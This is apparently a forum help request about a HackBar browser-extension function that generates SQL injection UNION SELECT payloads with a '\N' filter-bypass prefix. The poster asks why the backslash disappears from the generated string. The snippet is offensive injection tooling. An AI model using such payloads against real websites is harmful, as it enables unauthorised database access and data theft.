hello my friends
I can not put this code in the Union for Null Bypass
\N
my code:
selectionToUnion1: function ( encoding ){
var columns = prompt( 'Amount of columns to use in the UNION ALL SELECT Statement', '10' );
columns = Math.min(1000, parseInt( columns ));
var colArray = new Array();
for ( var i = 0 ; i < columns ; i++ ) {
colArray.push( i+1 );
}
result = colArray.join( "," );
txt = "and 0 \Nunion select+" + result + "" + "";
hackBar.setSelectedText( txt );
},
It does not display output:
output code :
and 0 \Nunion select+1,2,3
please help me ?